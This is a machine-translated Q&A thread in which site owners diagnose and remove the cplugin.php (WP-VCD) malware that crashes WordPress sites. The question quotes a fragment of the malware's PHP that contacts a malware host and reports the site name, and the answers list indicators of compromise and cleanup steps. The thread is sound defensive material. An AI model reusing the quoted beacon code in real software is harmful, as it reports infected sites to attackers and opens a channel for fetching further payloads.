Блог

Главная - Вопросы по программированию - ошибка веб-сайта WordPress 500 и сбои из-за cplugin.php файловое вредоносное ПО

ошибка веб-сайта WordPress 500 и сбои из-за cplugin.php файловое вредоносное ПО

#wordpress #malware #http-status-code-500

#wordpress #вредоносное ПО #http-status-code-500

Вопрос:

Недавно произошла атака, в результате которой многие веб-сайты WordPress были отключены из-за файла cplugin.php , который является вредоносным ПО.

Вредоносное ПО представляет собой плохо написанный код, поэтому на данный момент оно в основном вызывает ошибку времени выполнения сервера 500. Но лучше удалить его немедленно, поскольку он мигрирует на все несколько веб-сайтов на сервере и содержит код для перехода по URL вредоносного ПО для загрузки дополнительных файлов. Фрагмент вредоносного кода:

 if(get_option('log_install') !=='1')
{
    if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]))
{
    $log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.php?host=".$_SERVER["HTTP_HOST"]);
}
}

Я нашел решение и сам публикую ответ, чтобы помочь всем пользователям.

Редактировать:

Есть сообщения о том, что один и тот же файл у пользователей называется по-разному: ccode.php, cplugin.php и helad.php в этом случае исправление может быть изменено.

Ответ №1:

Это не атака, а вредоносное ПО, включенное в плагин nulled или тему, которые вы скачали и установили самостоятельно. Это обновленная версия WP-VCD — у WordFence есть технический документ со всеми подробностями об этом в WP-VCD: Вредоносное ПО, которое вы установили на свой собственный сайт, возможно, нам следует назвать его «WP-VCD Reloaded» 🙂

Индикаторами компрометации являются файлы плагинов с именами ccode.php , cplugin.php , helad.php и mplugin.php admin_ips.txt ) в wp-content/plugins и плагины / темы с файлом class.plugin-modules.php или class.theme-modules.php где-то в их папке.

Очистка

  1. Найдите плагин или тему с вредоносным ПО в class.plugin-modules.php или class.theme-modules.php и удалите плагин или тему (если вам это нужно — приобретите их из официального источника).
  2. Удалите вредоносные плагины: ccode.php , cplugin.php , helad.php или mplugin.php .
  3. Повторите это для всех сайтов с той же учетной записью хостинга / сервером.

Процедура установки, похоже, затрагивает wp-includes/functions.php , но она только пытается удалить вредоносное ПО, так что, возможно, это часть какого-то обновления по сравнению с предыдущей версией вредоносного ПО.

Комментарии:

1. Да, но если вы читаете форумы WordPress, люди сталкивались с этим в основном с прошлой недели. Возможно, они недавно обновили вредоносное ПО и повторно выпустили его. Так что назвать это атакой было бы правильно 🙂 Также у некоторых моих клиентов была проблема, у которых не была установлена тема nulled или плагин. Это был единственный сервер веб-сайта с подлинной купленной и обновленной темой и плагинами. Также последняя версия WordPress. Я лично также никогда не использую темы / плагины с нулевым значением. Я думаю, что это что-то другое…. нужно копать глубже.

2. Сообщения на форуме WordPress связаны с очевидной ошибкой в вредоносном ПО — <код>cplugin.php </code> пытается обновиться при каждом запуске, поэтому на серверах c2 (command amp; control) был обнаружен код с ошибками, который, предположительно, был распространен неделю назад на сайты, на которых уже была установлена вредоносная программа, и начал выдавать ошибки. Я отслеживал эту группу nulled themes в течение нескольких лет, поэтому я копнул довольно глубоко. Работаю на хостинг-провайдера и, несмотря на сотни случаев заражения, до сих пор не нашел случая, который нельзя было бы отследить до nulled theme.

Ответ №2:

Это похоже на какую-то глобальную атаку. Существует файл cplugin.php в папке plugins, которая вызывает сбой сайта. Удаление файла бесполезно, поскольку он появляется снова. Также это заразит все другие сайты на сервере с несколькими сайтами. К счастью, после нескольких часов работы мы нашли исправление. Пожалуйста, внимательно прочитайте это, чтобы исправить ваш сайт:

  1. Создайте резервную копию вашей базы данных и файлов

  2. Отредактируйте свою таблицу wp_options, найдите свойство active_plugins и отредактируйте ее, вы увидите, что в ней есть запись плагина для cplugin.php . Мы должны удалить его. Ваши исходные данные будут выглядеть примерно так:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

Отредактируйте это, чтобы удалить cplugin.php запись, начните с i следующего ; и удалите это. (Убедитесь, что в вашей базе данных создана резервная копия на случай, если вы допустили какую-то ошибку). Новая запись без cplugin.php будет выглядеть как:

a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....

  1. Выполните этот шаг аналогично для поля в таблице wp_option с именем site_transient_update_plugins

перед: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....

после: O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....

  1. После обновления ваших полей вернитесь в основную папку плагинов /wp-content/plugins и удалите файл cplugin.php

  2. Войдите в свою панель управления WordPress и повторно активируйте все свои плагины

Вуаля, вы исправили свой веб-сайт.

Я думаю, что технической причиной этого может быть то, что вредоносное ПО регистрируется как плагин WordPress, который автоматически заменяет файл при удалении. К счастью, вредоносное ПО представляет собой плохо написанный код, поэтому вместо запуска оно в основном выдает 500 error . Но в любом случае я бы рекомендовал удалить его немедленно после его обновления.

Редактировать: Согласно теме форума WordPress по этой теме, для некоторых пользователей простое переименование файла также заставляет веб-сайт работать, что, вероятно, связано с тем, что переименование файлов в WordPress деактивирует плагин, благодаря которому веб-сайты начинают работать. Но я бы не стал переименовывать зараженные файлы и хранить их в любом случае, поэтому рекомендовал бы первое решение по крайней мере после получения доступа к сайту.

Комментарии:

1. спасибо за это, я внес некоторые изменения в базу данных, и это привело к поломке моего сайта — надеюсь, резервная копия будет в порядке, когда я импортирую старую резервную копию, которая у меня есть 🙂

Ответ №3:

Другой способ исправить это в 3 шага :

  1. Удалите все записи в wp_option, созданные вредоносным плагином с этим запросом :

УДАЛИТЬ ИЗ wp_options ГДЕ option_name=’ip_admin’ ИЛИ option_name=»ad_code» ИЛИ option_name=»cookies_admin» ИЛИ option_name=»logged_admin» ИЛИ option_name=»logged_admin» ИЛИ option_name=»hide_admin» ИЛИ option_name=»hide_logged_in» ИЛИ option_name=»display_ad» ИЛИ option_name =»search_engines» ИЛИ option_name=»авто_обновление» ИЛИ option_name=»log_install»

  1. Определите файл плагина wild, созданный в каталоге /wp-content /plugins (ls -lrtha в ОС Linux), удалите его и создайте символическую ссылку на /dev / null с тем же именем, при этом файл никогда не создавался корректно после. Командная строка для этого (в Linux) :

    ln -s /dev/null mplugin.php

  2. Необязательно, но просто чтобы избежать шума в журнале ошибок, удалите nameplugin.php из таблицы wp_options, где option_name = _site_transient_update_plugins.

Ответ №4:

На наших сайтах не было записи в базе данных, но коды вызовов были добавлены в нижней части functions.php в папке wp-includes. Удаление вызывающего вызова, и сайты сразу же открылись. 🙂

Комментарии:

1. Спасибо за информацию. Вы уверены, что это была атака cplugin? Потому что в WordPress есть много других типов вредоносных программ. Обычно большинство из них демонстрируют схожее поведение при совершении вызовов на какой-либо вредоносный веб-сайт для загрузки файлов и скриптов или для принудительного перенаправления. В любом случае я бы рекомендовал установить строгие права доступа к файлам и плагин безопасности wordfence для большей безопасности.

Ответ №5:

В папке wp-content файл под названиемcplugin.php и helad.php в этом случае исправление может быть изменено. немедленно удалите его, поскольку он мигрирует на все несколько веб-сайтов на сервере и содержит код для перехода по URL вредоносного ПО для загрузки дополнительных файлов.

Ответ №6:

Вы использовали тему или плагин null.